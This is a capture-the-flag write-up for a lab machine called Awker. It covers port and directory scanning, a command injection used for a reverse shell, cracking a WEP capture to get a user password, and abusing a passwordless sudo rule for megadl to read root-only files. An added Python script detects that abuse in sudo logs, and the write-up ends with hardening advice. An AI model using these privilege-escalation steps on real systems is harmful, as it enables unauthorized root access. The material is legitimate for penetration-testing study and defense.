Awker

A quick write-up.

Information gathering

root@kali:~# nmap 192.168.100.56 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-06 08:41 EDT
Nmap scan report for 192.168.100.56
Host is up (0.00065s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:83:CD:4D (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 6.95 seconds

Port 80 serves a phpinfo page.


root@kali:~# gobuster dir -x php,txt,html,js -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -u http://192.168.100.56
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.100.56
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html,js
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/index.php            (Status: 200) [Size: 85768]
/.html                (Status: 403) [Size: 279]
/learning.php         (Status: 200) [Size: 4891]
Progress: 17591 / 1102800 (1.60%)^C


The directory scan turns up /learning.php, which has a straightforward command injection.


Use it to get a reverse shell directly.

User privilege escalation

www-data@Awker:/var/www/html$ find / -readable -type f 2>/dev/null|grep -Pv "proc|sys|boot|usr|run|etc|var|snap"
/home/welcome/WEP-capture.pcap
/home/welcome/.bash_logout
/home/welcome/.bashrc
/home/welcome/.profile

There is a WEP capture in welcome's home directory; pull it to the local machine and crack it with aircrack-ng.

aircrack-ng WEP-capture.pcap

                                                         Aircrack-ng 1.7


                                           [00:00:01] Tested 60016 keys (got 17273 IVs)

   KB    depth   byte(vote)
    0    0/  1   4D(28160) 24(23808) 58(23552) 44(22528) B7(22528) 94(21760) D2(21504) 00(20992) 39(20992) 71(20992)
    1    4/ 34   59(21760) E1(21504) 5B(21504) B0(20992) 56(20736) 98(20736) A6(20736) B4(20480) EF(20480) 86(20480)
    2   36/ 45   04(19712) 16(19456) 41(19456) 56(19456) 7B(19456) 7C(19456) 81(19456) E6(19456) F1(19456) F2(19456)
    3   14/ 40   45(20992) D3(20992) 94(20736) 04(20736) 0F(20480) 58(20480) B2(20480) 00(20480) 1E(20224) 20(20224)
    4    0/  1   59(27648) 6F(23040) 25(22016) 20(21760) 38(21760) 30(21504) 53(21504) 67(21504) 84(21504) DB(21504)

                     KEY FOUND! [ 4D:59:4B:45:59 ] (ASCII: MYKEY )
    Decrypted correctly: 100%

This yields MYKEY, which is the password of the welcome user.

User flag
welcome@Awker:~$ cat user.txt
flag{user-4e9e3333bfeff9fd6a40fca5ce9b05b7}

Root privilege escalation

welcome@Awker:~$ sudo -l
Matching Defaults entries for welcome on Awker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User welcome may run the following commands on Awker:
    (ALL) NOPASSWD: /usr/bin/megadl
welcome@Awker:~$ megadl -help
Usage:
  megadl [OPTION…] - download exported files from mega.nz

Help Options:
  -h, --help                  Show help options
  --help-all                  Show all help options

Application Options:
  --path=PATH                 Local directory or file name, to save data to
  --no-progress               Disable progress bar
  --print-names               Print names of downloaded files
  --choose-files              Choose which files to download when downloading folders (interactive)
  --disable-resume            Disable resume when downloading file
  -u, --username=USERNAME     Account username (email)
  -p, --password=PASSWORD     Account password
  --no-ask-password           Never ask interactively for a password
  --reload                    Reload filesystem cache
  --limit-speed=SPEED         Limit transfer speed (KiB/s)
  --proxy=PROXY               Proxy setup string
  --config=PATH               Load configuration from a file
  --ignore-config-file        Disable loading .megarc
  --debug=OPTS                Enable debugging output
  --version                   Show version information

megadl is a downloader for the Mega cloud storage service.

Since it accepts an arbitrary config file, and the parser echoes any line it cannot parse in its error message, the root flag can be read directly with it.

welcome@Awker:~$ sudo /usr/bin/megadl --config=/root/root.txt
ERROR: Failed to open config file: /root/root.txt: Key file contains line “flag{root-e93a188c288106b24060679d47cc630f}” which is not a key-value pair, group, or comment

To get a shell:

First, check whether root has an authorized public key.

welcome@Awker:~$ sudo /usr/bin/megadl --config=/root/.ssh/authorized_keys
ERROR: Failed to open config file: /root/.ssh/authorized_keys: Key file contains line “root:16b02f836fadea32dea19a110e3d588d” which is not a key-value pair, group, or comment

This does not look like a public key either; it should be root's password, so simply su to root.

Alternatively, upload a cron job file to Mega, then pull it down on the target machine, using --path= to specify where it is saved.
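From the defender's side, both tricks above leave a trace: sudo logs the full command line, so a root-level run of megadl with --config= or --path= pointing into /root or /etc stands out. The following Python check, added here and not part of the original write-up, scans sudo syslog lines for exactly that pattern; the log lines and the mega.nz URL are constructed samples.

```python
import re

# Constructed sample lines in the standard sudo syslog format (not from the write-up).
SAMPLE_LOG = """\
May  6 08:50:01 Awker sudo:  welcome : TTY=pts/0 ; PWD=/home/welcome ; USER=root ; COMMAND=/usr/bin/megadl --config=/root/root.txt
May  6 08:51:12 Awker sudo:  welcome : TTY=pts/0 ; PWD=/home/welcome ; USER=root ; COMMAND=/usr/bin/megadl --config=/root/.ssh/authorized_keys
May  6 08:52:30 Awker sudo:  welcome : TTY=pts/0 ; PWD=/home/welcome ; USER=root ; COMMAND=/usr/bin/megadl --path=/etc/cron.d/job https://mega.nz/file/EXAMPLE
May  6 08:53:45 Awker sudo:  welcome : TTY=pts/0 ; PWD=/home/welcome ; USER=root ; COMMAND=/usr/bin/megadl --path=/home/welcome/dl https://mega.nz/file/EXAMPLE
"""

# sudo writes: "sudo:  <user> : TTY=... ; PWD=... ; USER=<runas> ; COMMAND=<cmd>"
SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+) : .*?USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.*)$"
)
# File-taking options of megadl seen in the write-up: --config=PATH (read) and --path=PATH (write).
PATH_OPT_RE = re.compile(r"--(?P<opt>config|path)=(?P<value>\S+)")
# Locations an unprivileged user should never be reading from or writing to via sudo.
SENSITIVE_PREFIXES = ("/root", "/etc", "/var/spool/cron", "/var/lib", "/proc")


def parse_sudo_line(line):
    """Return {user, runas, cmd} for a sudo log line, or None if it is not one."""
    m = SUDO_RE.search(line)
    return m.groupdict() if m else None


def flag_path_arguments(record):
    """Return (user, runas, option, path) for every file option aimed at a sensitive path."""
    findings = []
    for opt in PATH_OPT_RE.finditer(record["cmd"]):
        if opt["value"].startswith(SENSITIVE_PREFIXES):
            findings.append((record["user"], record["runas"], opt["opt"], opt["value"]))
    return findings


def scan_sudo_log(text):
    """Scan a block of syslog text; only commands run as root are of interest."""
    findings = []
    for line in text.splitlines():
        rec = parse_sudo_line(line)
        if rec and rec["runas"] == "root":
            findings.extend(flag_path_arguments(rec))
    return findings


if __name__ == "__main__":
    for user, runas, opt, path in scan_sudo_log(SAMPLE_LOG):
        print(f"ALERT: {user} ran megadl as {runas} with --{opt}={path}")
```

The fix on the sudoers side is to restrict the allowed arguments (a bare command path permits any options), since a NOPASSWD entry for any tool that opens user-supplied files is effectively a root file read/write.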

Root flag
root@Awker:~# cat root.txt
flag{root-e93a188c288106b24060679d47cc630f}